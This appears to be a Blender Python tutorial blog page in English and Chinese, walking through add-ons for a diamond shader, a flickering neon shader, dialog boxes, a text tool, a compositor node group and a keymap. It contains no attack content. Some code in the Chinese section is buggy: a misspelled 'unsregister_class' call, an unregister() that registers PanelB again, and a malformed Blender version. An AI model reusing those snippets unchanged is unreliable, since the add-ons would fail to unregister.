        # Setting the Label
        add1_node.label = "Add 1"
        # Minimizes the Node
        add1_node.hide = True
        # Deselect the Node
        add1_node.select = False

        # Create the Add Shader Node and Reference it as 'Add2'
        add2_node = material_diamond.node_tree.nodes.new('ShaderNodeAddShader')
        # Setting the Location
        add2_node.location = (0, 0)
        # Setting the Label
        add2_node.label = "Add 2"
        # Minimizes the Node
        add2_node.hide = True
        # Deselect the Node
        add2_node.select = False

        # Adding Glass4 Node
        glass4_node = material_diamond.node_tree.nodes.new('ShaderNodeBsdfGlass')
        # Set location of node
        glass4_node.location = (-150, -150)
        # Setting the Default Color
        glass4_node.inputs[0].default_value = (1, 1, 1, 1)
        # Setting the Default IOR Value
        glass4_node.inputs[2].default_value = 1.450
        # Deselect the Node
        glass4_node.select = False

        # Create the Mix Shader Node and Reference it as 'Mix1'
        mix1_node = material_diamond.node_tree.nodes.new('ShaderNodeMixShader')
        # Setting the Location
        mix1_node.location = (200, 0)
        # Deselect the Node
        mix1_node.select = False

        # Creating Links between the Nodes
        material_diamond.node_tree.links.new(glass1_node.outputs[0], add1_node.inputs[0])
        material_diamond.node_tree.links.new(glass2_node.outputs[0], add1_node.inputs[1])
        material_diamond.node_tree.links.new(add1_node.outputs[0], add2_node.inputs[0])
        material_diamond.node_tree.links.new(glass3_node.outputs[0], add2_node.inputs[1])
        material_diamond.node_tree.links.new(add2_node.outputs[0], mix1_node.inputs[1])
        material_diamond.node_tree.links.new(glass4_node.outputs[0], mix1_node.inputs[2])
        material_diamond.node_tree.links.new(mix1_node.outputs[0], material_output.inputs[0])
        # Assign the material to the active object
        bpy.context.object.active_material = material_diamond

        return {'FINISHED'}


def register():
    bpy.utils.register_class(ShaderMainPanel)
    bpy.utils.register_class(SHADER_OT_DIAMOND)


def unregister():
    bpy.utils.unregister_class(ShaderMainPanel)
    bpy.utils.unregister_class(SHADER_OT_DIAMOND)


if __name__ == '__main__':
    register()

Via Edit > Preferences > Add-ons, search for "extra" and enable Add Mesh: Extra Objects; Blender can then create diamond-shaped objects.

[screenshot]

Create a diamond-shaped object, run the code, and click Diamond to add the shader to it:

[screenshot]

The author's more elaborate ShaderLibrary.py can be downloaded from the ShaderLibrary.py - Google Drive link in Darkfall : Blender Python Tutorial: How to create an Add-on - The Shader Library [bpy] (darkfallblender.blogspot.com).

    Add a keyframe & Modifier with Python [learn python for beginners]

This code defines a Blender add-on with a "Hello World Panel" that provides a "Neon" shader, reachable from the "Name your New Tab" tab in the 3D Viewport sidebar. The panel contains an "Add Neon Shader" button; clicking it builds the shader and assigns it to the active object.

Concretely, the file first defines the HelloWorldPanel panel class, which renders the user interface and holds one button wired to "shader.neon_operator". In the operator's execute() function, a new material is created with node mode enabled and the default Principled BSDF node is removed. An Emission node with a light blue color is added, its Strength input is keyframed at the current frame, and a NOISE modifier is attached to the resulting F-curve so the strength jitters over time. Finally the Emission node is linked to the Material Output.

Finally, register() and unregister() register and unregister the add-on's classes with Blender.

import bpy


class HelloWorldPanel(bpy.types.Panel):
    """Creates a Panel in the Object properties window"""
    bl_label = "Hello World Panel"
    bl_idname = "OBJECT_PT_hello"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "Name your New Tab"

    def draw(self, context):
        layout = self.layout

        obj = context.object

        row = layout.row()
        row.operator('shader.neon_operator')


class SHADER_OT_NEON(bpy.types.Operator):
    bl_label = 'Add Neon Shader'
    bl_idname = 'shader.neon_operator'

    def execute(self, context):
        cur_frame = bpy.context.scene.frame_current

        # Creating a New Shader and calling it Neon
        material_neon = bpy.data.materials.new(name="Neon")
        # Enabling Use Nodes
        material_neon.use_nodes = True

        tree = material_neon.node_tree

        # Removing the Principled Node
        material_neon.node_tree.nodes.remove(material_neon.node_tree.nodes.get('Principled BSDF'))
        # Create a reference to the Material Output
        material_output = material_neon.node_tree.nodes.get('Material Output')
        # Set location of node
        material_output.location = (400, 0)

        # Adding the Emission Node
        emiss_node = material_neon.node_tree.nodes.new('ShaderNodeEmission')
        # Set location of node
        emiss_node.location = (200, 0)
        # Setting the Default Color
        emiss_node.inputs[0].default_value = (0.59, 0.76, 1, 1)
        # Setting the Emission Strength and keyframing it at the current frame
        emiss_node.inputs[1].default_value = 2
        emiss_node.inputs[1].keyframe_insert('default_value', frame=cur_frame)

        data_path = f'nodes["{emiss_node.name}"].inputs[1].default_value'

        # Attach a NOISE modifier to the strength F-curve so the value jitters
        fcurves = tree.animation_data.action.fcurves
        fc = fcurves.find(data_path)
        if fc:
            new_mod = fc.modifiers.new('NOISE')
            new_mod.strength = 10
            new_mod.depth = 1

        material_neon.node_tree.links.new(emiss_node.outputs[0], material_output.inputs[0])

        # Assign the material to the active object so the flicker is visible
        bpy.context.object.active_material = material_neon

        return {'FINISHED'}


def register():
    bpy.utils.register_class(HelloWorldPanel)
    bpy.utils.register_class(SHADER_OT_NEON)


def unregister():
    bpy.utils.unregister_class(HelloWorldPanel)
    bpy.utils.unregister_class(SHADER_OT_NEON)


if __name__ == "__main__":
    register()

This creates a shader plus an F-curve modifier that makes the object it is assigned to flicker.

[screenshot]

    Create a popup dialog box

Defines a WM_OT_myOp class that opens a dialog box. The Blender version in the original video is a bit old, so some code has been replaced:

class WM_OT_myOp(bpy.types.Operator):
    """Open the Add Cube Dialog Box"""
    bl_label = 'Add Cube Dialog Box'
    bl_idname = 'wm.myop'

    # text = bpy.props.StringProperty(name='Enter Text', default='')
    text: bpy.props.StringProperty(name='Enter Text', default='')
    # scale = bpy.props.FloatVectorProperty(name='Scale', default=1)
    scale: bpy.props.FloatVectorProperty(name='Scale', default=(1, 1, 1))

    def execute(self, context):
        t = self.text
        s = self.scale

        bpy.ops.mesh.primitive_cube_add()
        obj = bpy.context.object
        obj.name = t
        obj.scale[0] = s[0]
        obj.scale[1] = s[1]
        obj.scale[2] = s[2]

        return {'FINISHED'}

    def invoke(self, context, event):
        return context.window_manager.invoke_props_dialog(self)

Merged into the earlier AddObjectScript.py: the line row.operator('wm.myop', icon='CUBE', text='Cube') adds the new WM_OT_myOp operator (bl_idname = 'wm.myop') to TestPanel:

bl_info = {
    'name': 'Object Adder',
    'author': 'Darkfall',
    'version': (1, 0),
    'blender': (3, 5, 1),
    'location': 'View3d > Tool',
    'warning': '',
    'wiki_url': '',
    'category': 'Add Mesh',
}

import bpy


class TestPanel(bpy.types.Panel):
    bl_label = "Test Panel"
    bl_idname = "PT_TestPanel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'My 1st Addona'

    def draw(self, context):
        layout = self.layout
        layout.scale_y = 1.4

        row = layout.row()
        row.label(text='Add an object', icon='OBJECT_ORIGIN')
        row = layout.row()
        row.operator('wm.myop', icon='CUBE', text='Cube')
        row = layout.row()
        row.operator('mesh.primitive_cube_add', icon='CUBE')
        row.operator('mesh.primitive_uv_sphere_add', icon='SPHERE')
        row = layout.row()
        row.operator('object.text_add', icon='FILE_FONT')


class PanelA(bpy.types.Panel):
    bl_label = "Scale"
    bl_idname = "PT_PanelA"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'My 1st Addona'
    bl_parent_id = 'PT_TestPanel'
    bl_options = {'DEFAULT_CLOSED'}

    def draw(self, context):
        layout = self.layout
        obj = context.object

        row = layout.row()
        row.label(text='Select an option to scale your object.', icon='FONT_DATA')
        row = layout.row()
        row.operator('transform.resize')
        row = layout.row()
        layout.scale_y = 1.2

        col = layout.column()
        col.prop(obj, 'scale')


class PanelB(bpy.types.Panel):
    bl_label = "Specials"
    bl_idname = "PT_PanelB"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'My 1st Addona'
    bl_parent_id = 'PT_TestPanel'
    bl_options = {'DEFAULT_CLOSED'}

    def draw(self, context):
        layout = self.layout

        row = layout.row()
        row.label(text='Select a Special Option', icon='COLOR_BLUE')
        row = layout.row()
        row.operator('object.shade_smooth', icon='MOD_SMOOTH', text='Set Smooth Shading')
        row.operator('object.subdivision_set')
        row = layout.row()
        row.operator('object.modifier_add')


class WM_OT_myOp(bpy.types.Operator):
    """Open the Add Cube Dialog Box"""
    bl_label = 'Add Cube Dialog Box'
    bl_idname = 'wm.myop'

    # text = bpy.props.StringProperty(name='Enter Text', default='')
    text: bpy.props.StringProperty(name='Enter Text', default='')
    # scale = bpy.props.FloatVectorProperty(name='Scale', default=1)
    scale: bpy.props.FloatVectorProperty(name='Scale', default=(1, 1, 1))

    def execute(self, context):
        t = self.text
        s = self.scale

        bpy.ops.mesh.primitive_cube_add()
        obj = bpy.context.object
        obj.name = t
        obj.scale[0] = s[0]
        obj.scale[1] = s[1]
        obj.scale[2] = s[2]

        return {'FINISHED'}

    def invoke(self, context, event):
        return context.window_manager.invoke_props_dialog(self)


def register():
    bpy.utils.register_class(TestPanel)
    bpy.utils.register_class(PanelA)
    bpy.utils.register_class(PanelB)
    bpy.utils.register_class(WM_OT_myOp)


def unregister():
    bpy.utils.unregister_class(TestPanel)
    bpy.utils.unregister_class(PanelA)
    bpy.utils.unregister_class(PanelB)
    bpy.utils.unregister_class(WM_OT_myOp)


if __name__ == '__main__':
    register()

Run it! Clicking OK creates a cube with the given name and scale.

[screenshot]

    Creating the Text Tool Add-on

This is a simple Blender add-on providing a "Text Tool" panel for adding text objects, with options for the text content, scale, whether to center the origin, whether to extrude, and so on.

At the top of the file, the bl_info dictionary defines the add-on's basic information: name, author, version, required Blender version, description, and more. Blender uses this to display and identify the add-on.

The OBJECT_PT_TextTool class defines the add-on's UI panel, shown in the 3D Viewport sidebar under a "Text Tool" tab. The panel holds one button that invokes the WM_OT_textOp operator class to add the configured text object.

The WM_OT_textOp operator class implements adding the text object in its execute() method, and uses invoke() to show a properties dialog so the user can set the text object's options first.

At the end of the file, register() registers the add-on's classes and unregister() removes them, which lets Blender display the add-on correctly and make it available when needed.

bl_info = {
    "name": "Text Tool",
    "author": "Darkfall",
    "version": (1, 0),
    "blender": (3, 5, 1),
    "location": "View3D > Add > Mesh > New Object",
    "description": "Adds a new Mesh Object",
    "warning": "",
    "doc_url": "",
    "category": "Add Mesh",
}

import bpy


class OBJECT_PT_TextTool(bpy.types.Panel):
    """Creates a Panel in the Object properties window"""
    bl_label = "Text Tool"
    bl_idname = "OBJECT_PT_TextTool"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'Text Tool'

    def draw(self, context):
        layout = self.layout

        row = layout.row()
        row.operator('wm.textop', text='Add Text', icon='OUTLINER_OB_FONT')


class WM_OT_textOp(bpy.types.Operator):
    bl_label = 'Text Tool Operator'
    bl_idname = 'wm.textop'

    text: bpy.props.StringProperty(name='Enter Text', default='')
    scale: bpy.props.FloatVectorProperty(name='Scale', default=(1, 1, 1))
    center: bpy.props.BoolProperty(name='Center Origin', default=False)
    extrude: bpy.props.BoolProperty(name='Extrude', default=False)
    extrude_amount: bpy.props.FloatProperty(name='Extrude Amount', default=0.06)

    def execute(self, context):
        t = self.text
        s = self.scale
        c = self.center
        e = self.extrude
        ea = self.extrude_amount

        bpy.ops.object.text_add(enter_editmode=True, location=(0, 0, 0))
        bpy.ops.font.delete(type='PREVIOUS_WORD')
        bpy.ops.font.text_insert(text=t)
        bpy.ops.object.editmode_toggle()

        if e == True:
            bpy.context.object.data.extrude = ea

        if c == True:
            bpy.context.object.data.align_x = 'CENTER'
            bpy.context.object.data.align_y = 'CENTER'
        return {'FINISHED'}

    def invoke(self, context, event):
        return context.window_manager.invoke_props_dialog(self)


def register():
    bpy.utils.register_class(OBJECT_PT_TextTool)
    bpy.utils.register_class(WM_OT_textOp)


def unregister():
    bpy.utils.unregister_class(OBJECT_PT_TextTool)
    bpy.utils.unregister_class(WM_OT_textOp)


if __name__ == "__main__":
    register()

This creates a text object; centering and extrusion (depth) are both optional.

[screenshot]

    Create Custom Node Group

Blender node groups bundle several nodes together so they can be reused across scenes. With a custom node group you define a set of nodes once and reuse it whenever needed, instead of manually wiring up a pile of nodes every time.

A node group can expose multiple inputs and outputs, which makes it flexible to use. For example, you can wrap an algorithm in a custom node group and call it over and over like a subroutine, making the whole workflow more efficient.

Beyond that, a node group hides the internal complexity of the nodes it wraps, simplifying a project's structure and management. To share node groups or use them in other projects, save them in a .blend file or as a Python script.
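As a side note, a saved group can also be pulled in from another .blend via Python; a minimal sketch, where the path and group name are placeholders:

import bpy

# Load a node group by name from another .blend file (path/name are placeholders)
lib_path = '/path/to/library.blend'
with bpy.data.libraries.load(lib_path) as (data_from, data_to):
    data_to.node_groups = ['MyGroup']

group = bpy.data.node_groups['MyGroup']  # ready to assign to a group node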

In short, node groups are one of Blender's most practical features: they improve productivity, simplify project management, and make Blender more powerful and flexible.

This code is a Blender add-on that creates a custom node group.

First, the NODE_PT_MAINPANEL class, inheriting from bpy.types.Panel, defines a panel in the Node Editor's (NODE_EDITOR) UI region, placed under the "New Tab" category. bl_label sets the panel name to "Custom Node Group"; bl_idname is the unique ID used to reference the panel in code.

The create_test_group() function builds the node group. It takes three parameters: the context, the operator, and the group_name string. It calls bpy.data.node_groups.new() to create a new node group of type 'CompositorNodeTree', i.e. a compositor node tree. It then creates the group input and output nodes plus two intermediate nodes, and links them together. Finally it returns the new node group object.

The NODE_OT_TEST class, inheriting from bpy.types.Operator, is the operator. bl_label is its name and bl_idname its unique ID. Its execute() method calls create_test_group() to build the custom node group and adds it to the scene's node tree.

Finally, register() and unregister() register and unregister the add-on. register_class() and unregister_class() add and remove the panel (NODE_PT_MAINPANEL) and the operator (NODE_OT_TEST) so they are available in Blender. The if __name__ == "__main__": block runs register() when the script is executed directly, so the add-on can be used right away.

import bpy


class NODE_PT_MAINPANEL(bpy.types.Panel):
    bl_label = "Custom Node Group"
    bl_idname = "NODE_PT_MAINPANEL"
    bl_space_type = 'NODE_EDITOR'
    bl_region_type = 'UI'
    bl_category = 'New Tab'

    def draw(self, context):
        layout = self.layout

        row = layout.row()
        row.operator('node.test_operator')


def create_test_group(context, operator, group_name):
    # enable use nodes
    bpy.context.scene.use_nodes = True

    test_group = bpy.data.node_groups.new(group_name, 'CompositorNodeTree')

    group_in = test_group.nodes.new('NodeGroupInput')
    group_in.location = (-200, 0)
    test_group.inputs.new('NodeSocketFloat', 'Factor Value')  # 0
    test_group.inputs.new('NodeSocketColor', 'Color Input')   # 1

    group_out = test_group.nodes.new('NodeGroupOutput')
    group_out.location = (400, 0)
    test_group.outputs.new('NodeSocketColor', 'Output')

    mask_node = test_group.nodes.new(type='CompositorNodeBoxMask')
    mask_node.location = (0, 0)
    mask_node.rotation = 1

    mix_node = test_group.nodes.new(type='CompositorNodeMixRGB')
    mix_node.location = (200, 0)
    mix_node.use_clamp = True
    mix_node.blend_type = 'OVERLAY'

    link = test_group.links.new

    link(mask_node.outputs[0], mix_node.inputs[1])

    link(group_in.outputs[0], mix_node.inputs[0])
    link(group_in.outputs[1], mix_node.inputs[2])

    link(mix_node.outputs[0], group_out.inputs[0])

    return test_group


class NODE_OT_TEST(bpy.types.Operator):
    bl_label = "Add Custom Node Group"
    bl_idname = "node.test_operator"

    def execute(self, context):
        custom_node_name = "Test Node"
        # argument order matches the (context, operator, group_name) signature
        my_group = create_test_group(context, self, custom_node_name)
        test_node = context.scene.node_tree.nodes.new('CompositorNodeGroup')
        test_node.node_tree = bpy.data.node_groups[my_group.name]
        test_node.use_custom_color = True
        test_node.color = (0.5, 0.4, 0.3)

        return {'FINISHED'}


def register():
    bpy.utils.register_class(NODE_PT_MAINPANEL)
    bpy.utils.register_class(NODE_OT_TEST)


def unregister():
    bpy.utils.unregister_class(NODE_PT_MAINPANEL)
    bpy.utils.unregister_class(NODE_OT_TEST)


if __name__ == "__main__":
    register()

    Custom Drawing / Layout Improvements

Polishes the UI of the earlier TextTool.py:

bl_info = {
    "name": "Text Tool",
    "author": "Darkfall",
    "version": (1, 0),
    "blender": (3, 5, 1),
    "location": "View3D > Add > Mesh > New Object",
    "description": "Adds a new Mesh Object",
    "warning": "",
    "doc_url": "",
    "category": "Add Mesh",
}

import bpy


class OBJECT_PT_TextTool(bpy.types.Panel):
    """Creates a Panel in the Object properties window"""
    bl_label = "Text Tool"
    bl_idname = "OBJECT_PT_TextTool"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'Text Tool'

    def draw(self, context):
        layout = self.layout

        row = layout.row()
        row.operator('wm.textop', text='Add Text', icon='OUTLINER_OB_FONT')


class WM_OT_textOp(bpy.types.Operator):
    bl_label = 'Text Tool Operator'
    bl_idname = 'wm.textop'

    text: bpy.props.StringProperty(name='Enter Text', default='')
    scale: bpy.props.FloatVectorProperty(name='Scale', default=(1, 1, 1))
    rotation: bpy.props.BoolProperty(name='Z up', default=False)
    center: bpy.props.BoolProperty(name='Center Origin', default=False)
    extrude: bpy.props.BoolProperty(name='Extrude', default=False)
    extrude_amount: bpy.props.FloatProperty(name='Extrude Amount', default=0.06)

    def draw(self, context):
        layout = self.layout
        layout.separator(factor=1)
        layout.label(text='Sample Text')

        layout.prop(self, 'text')
        layout.prop(self, 'scale')

        layout.separator(factor=2)

        box = layout.box()

        row = box.row()
        row.prop(self, 'rotation')
        if self.rotation == True:
            row.label(text='Orientation: Z UP', icon='EMPTY_SINGLE_ARROW')
        else:
            row.label(text='Orientation: Default', icon='ARROW_LEFTRIGHT')

        row = box.row()
        row.prop(self, 'center')
        if self.center == True:
            row.label(text='Alignment: Center', icon='ALIGN_CENTER')
        else:
            row.label(text='Alignment: Default', icon='ALIGN_LEFT')

        row = box.row()
        row.prop(self, 'extrude')
        if self.extrude == True:
            row.prop(self, 'extrude_amount')

    def execute(self, context):
        t = self.text
        s = self.scale
        c = self.center
        e = self.extrude
        ea = self.extrude_amount
        r = self.rotation

        bpy.ops.object.text_add(enter_editmode=True, location=(0, 0, 0))
        bpy.ops.font.delete(type='PREVIOUS_WORD')
        bpy.ops.font.text_insert(text=t)
        bpy.ops.object.editmode_toggle()

        if r == True:
            bpy.context.object.rotation_euler[0] = 1.5708
        if e == True:
            bpy.context.object.data.extrude = ea

        if c == True:
            bpy.context.object.data.align_x = 'CENTER'
            bpy.context.object.data.align_y = 'CENTER'
        return {'FINISHED'}

    def invoke(self, context, event):
        return context.window_manager.invoke_props_dialog(self)


def register():
    bpy.utils.register_class(OBJECT_PT_TextTool)
    bpy.utils.register_class(WM_OT_textOp)


def unregister():
    bpy.utils.unregister_class(OBJECT_PT_TextTool)
    bpy.utils.unregister_class(WM_OT_textOp)


if __name__ == "__main__":
    register()

[screenshot]

Shortcut / Custom Keymap [learn python for beginners]

Modify popupdialogboxTemplate.py so that pressing SHIFT+F opens the dialog box:

import bpy


class WM_OT_myOp(bpy.types.Operator):
    """Open the Add Cube Dialog Box"""
    bl_label = 'Add Cube Dialog Box'
    bl_idname = 'wm.myop'

    # text = bpy.props.StringProperty(name='Enter Text', default='')
    text: bpy.props.StringProperty(name='Enter Text', default='')
    # scale = bpy.props.FloatVectorProperty(name='Scale', default=1)
    scale: bpy.props.FloatVectorProperty(name='Scale', default=(1, 1, 1))

    def execute(self, context):
        t = self.text
        s = self.scale

        bpy.ops.mesh.primitive_cube_add()
        obj = bpy.context.object
        obj.name = t
        obj.scale[0] = s[0]
        obj.scale[1] = s[1]
        obj.scale[2] = s[2]

        return {'FINISHED'}

    def invoke(self, context, event):
        return context.window_manager.invoke_props_dialog(self)


addon_keymaps = []


def register():
    bpy.utils.register_class(WM_OT_myOp)

    wm = bpy.context.window_manager
    kc = wm.keyconfigs.addon
    if kc:
        km = kc.keymaps.new(name='3D View', space_type='VIEW_3D')
        kmi = km.keymap_items.new('wm.myop', type='F', value='PRESS', shift=True)
        addon_keymaps.append((km, kmi))


def unregister():
    for km, kmi in addon_keymaps:
        km.keymap_items.remove(kmi)
    addon_keymaps.clear()
    bpy.utils.unregister_class(WM_OT_myOp)


if __name__ == '__main__':
    register()

Pressing SHIFT+F in the 3D View now opens the dialog box:

[screenshot]

    ]]>
    + 资源

    课程

    An Introduction to Scripting

    将视图改成如下图所示,拖动视图的右上角可以分离视图:

    jpg

    编写 python 代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    import bpy

    class TestPanel(bpy.types.Panel):
    bl_label = "Test Panel"
    bl_idname = "PT_TestPanel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'My 1st Addona'

    def draw(self, context):
    layout = self.layout

    row = layout.row()
    row.label(text='Add an object', icon='CUBE')
    row = layout.row()
    row.operator('mesh.primitive_cube_add', icon='CUBE')
    row.operator('mesh.primitive_uv_sphere_add', icon='SPHERE')
    row = layout.row()
    row.operator('object.text_add', icon='FILE_FONT')


    def register():
    bpy.utils.register_class(TestPanel)

    def unregister():
    bpy.utils.unsregister_class(TestPanel)


    if __name__ == '__main__':
    register()

    这段 python 代码是在 Blender 中添加一个面板(Panel),面板的名称为“Test Panel”,在 3D 视窗中显示,属于 UI 面板类型,属于"My 1st Addona"类别。这个面板里面添加了三个按钮,分别为添加一个立方体、添加一个球体、添加一个文字。

    具体解释如下:

    • 第一行导入了 blender 的 Python API,可以让我们在 Python 中使用 Blender 的功能。
    • 接下来定义了一个名为 TestPanel 的类,该类继承自 bpy.types.Panel,用于创建面板。bl_label 表示显示的名称,bl_idname 是给面板加上一个独有的 ID,可以在其他地方调用它,bl_space_type 表示要显示在哪种编辑器空间中,这里是VIEW_3D 3D 视窗中显示,bl_region_type 表示要显示在哪个区域内,这里是’UI’ 用户界面标签页。bl_category 表示在哪个类别下进行分组,这里将其放在“My 1st Addona”。
    • 然后是 draw 函数,用于绘制面板上的组件。self.layout 是布局对象,代表整个面板的布局。通过 layout 对象的 row()函数,可以创建一行组件。在这个例子中,首先创建一行 label 文本,然后又创建两个 button,分别调用了mesh.primitive_cube_add添加立方体,mesh.primitive_uv_sphere_add添加球体,最后再创建一个添加文字的按钮。
    • register()函数使用bpy.utils.register_class()方法将 TestPanel 类注册到 Blender 中,使其可用。
    • unregister()函数使用bpy.utils.unregister_class()方法取消注册 TestPanel 类。
    • 最后检查脚本是否在 Blender 内运行,如果是,则执行 register()函数。

    3D Viewport 视图下按 n 可以打开面板。

    jpg

    面板的图标名称可以通过Edit-Preferences-Add-ons-搜索icon-Icon Viewer的方式找到:

    jpg

    带创建物体的英文名称可以通过下图方式找到:

    jpg

    Finishing the Object Adder Add-on

    继续完善之前写的插件:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    bl_info = {
    'name': 'Object Adder',
    'author': 'Darkfall',
    'version': (1, 0),
    'blender': (3, 51, 0),
    'location': 'View3d > Tool',
    'warning': '',
    'wiki_url': '',
    'category': 'Add Mesh',

    }

    import bpy


    class TestPanel(bpy.types.Panel):
    bl_label = "Test Panel"
    bl_idname = "PT_TestPanel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'My 1st Addona'

    def draw(self, context):
    layout = self.layout
    layout.scale_y = 1.4

    row = layout.row()
    row.label(text='Add an object', icon='OBJECT_ORIGIN')
    row = layout.row()
    row.operator('mesh.primitive_cube_add', icon='CUBE')
    row.operator('mesh.primitive_uv_sphere_add', icon='SPHERE')
    row = layout.row()
    row.operator('object.text_add', icon='FILE_FONT')


    class PanelA(bpy.types.Panel):
    bl_label = "Scale"
    bl_idname = "PT_PanelA"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'My 1st Addona'
    bl_parent_id = 'PT_TestPanel'
    bl_options = {'DEFAULT_CLOSED'}

    def draw(self, context):
    layout = self.layout
    obj = context.object

    row = layout.row()
    row.label(text='Select an option to scale your object.', icon='FONT_DATA')
    row = layout.row()
    row.operator('transform.resize')
    row = layout.row()
    layout.scale_y = 1.2

    col = layout.column()
    col.prop(obj, 'scale')


    class PanelB(bpy.types.Panel):
    bl_label = "Specials"
    bl_idname = "PT_PanelB"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'My 1st Addona'
    bl_parent_id = 'PT_TestPanel'
    bl_options = {'DEFAULT_CLOSED'}

    def draw(self, context):
    layout = self.layout

    row = layout.row()
    row.label(text='Select a Special Option', icon='COLOR_BLUE')
    row = layout.row()
    row.operator('object.shade_smooth', icon='MOD_SMOOTH', text='Set Smooth Shading')
    row.operator('object.subdivision_set')
    row = layout.row()
    row.operator('object.modifier_add')


    def register():
    bpy.utils.register_class(TestPanel)
    bpy.utils.register_class(PanelA)
    bpy.utils.register_class(PanelB)


    def unregister():
    bpy.utils.unsregister_class(TestPanel)
    bpy.utils.unregister_class(PanelA)
    bpy.utils.register_class(PanelB)


    if __name__ == '__main__':
    register()

    jpg

    也可以通过 Edit-Preferences-Install... 的方式安装其他人写好的插件:

    jpg

    Preview: The Shader Library Add-on (Python Tutorial Result)

    How to create an Addon (The Shader Library)

    教你怎么用 Python 写一个 Shader 插件:

    调整窗口布局,一个 Shader Editor,一个 3D Viewport,一个 Text Editor:

    jpg

    这段代码定义了一个名为"Shader Libraey"的 Blender 插件,该插件提供了一个名为"Diamond"的着色器,可以在 3D 视图的工具栏中的"Shader Library"选项卡中访问。当用户点击该选项卡时,将显示一个面板,其中包含一个"选择要添加的着色器"标签和一个"Diamond"按钮,当用户单击该按钮时,将创建一个着色器并应用于活动对象上。

    具体而言,该代码文件首先定义了包含插件名称、作者、版本等信息的字典。接下来定义了一个面板类 ShaderMainPanel,它作为面板的主要控件,用于渲染用户界面。该面板包含一个文本标签和一个名为"shader.diamond_operator"的操作器,后者定义了所需的 Diamond 着色器。在操作器的 execute()函数中,创建一个新材质,激活其节点编辑模式,删除默认的 Principled BSDF 节点,然后创建和连接多个颜色为红、绿、蓝的玻璃节点,最后创建混合节点和连接多个节点以生成最终的 Diamond 着色器,将其分配给当前活动对象。

    最后,定义了两个函数 register()和 unregister(),它们用于在 Blender 应用程序中注册和取消注册插件的类。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    bl_info = {
    'name': 'Shader Libraey',
    'author': 'Darkfall',
    'version': (1, 0),
    'blender': (3, 51, 0),
    'location': 'View3d > Tool',
    'warning': '',
    'wiki_url': '',
    'category': 'Add Shader',

    }

    import bpy


    class ShaderMainPanel(bpy.types.Panel):
    bl_label = "Shader Library"
    bl_idname = "SHADER_PT_MAINPANEL"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "Shader Library"

    def draw(self, context):
    layout = self.layout

    row = layout.row()
    row.label(text='Select a Shader to be added.')
    row.operator('shader.diamond_operator')


    # Create a Custom Operator for the Diamond Shader
    class SHADER_OT_DIAMOND(bpy.types.Operator):
    bl_label = "Diamond"
    bl_idname = "shader.diamond_operator"

    def execute(self, context):
    # Creating a New Shader and calling it Diamond
    material_diamond = bpy.data.materials.new(name="Diamond")
    # Enabling Use Nodes
    material_diamond.use_nodes = True
    # Removing the Principled Node
    material_diamond.node_tree.nodes.remove(material_diamond.node_tree.nodes.get('Principled BSDF'))
    # Create a reference to the Material Output
    material_output = material_diamond.node_tree.nodes.get('Material Output')
    # Set location of node
    material_output.location = (-400,0)

    # Adding Glass1 Node
    glass1_node = material_diamond.node_tree.nodes.new('ShaderNodeBsdfGlass')
    # Set location of node
    glass1_node.location = (-600,0)
    # Setting the Default Color
    glass1_node.inputs[0].default_value = (1, 0, 0, 1)
    # Setting the Default IOR Value
    glass1_node.inputs[2].default_value = 1.446

    # Adding Glass2 Node
    glass2_node = material_diamond.node_tree.nodes.new('ShaderNodeBsdfGlass')
    # Set location of node
    glass2_node.location = (-600, -150)
    # Setting the Default Color
    glass2_node.inputs[0].default_value = (0, 1, 0, 1)
    # Setting the Default IOR Value
    glass2_node.inputs[2].default_value = 1.450

    # Adding Glass3 Node
    glass3_node = material_diamond.node_tree.nodes.new('ShaderNodeBsdfGlass')
    # Set location of node
    glass3_node.location = (-600, -300)
    # Setting the Default Color
    glass3_node.inputs[0].default_value = (0, 0, 1, 1)
    # Setting the Default IOR Value
    glass3_node.inputs[2].default_value = 1.450

    # Create the Add Shader Node and Reference it as 'Add1'
    add1_node = material_diamond.node_tree.nodes.new('ShaderNodeAddShader')
    # Setting the Location
    add1_node.location = (-400,-50)
    # Setting the Label
    add1_node.label = "Add 1"
    # Minimizes the Node
    add1_node.hide = True
    # Deselect the Node
    add1_node.select = False

    # Create the Add Shader Node and Reference it as 'Add2'
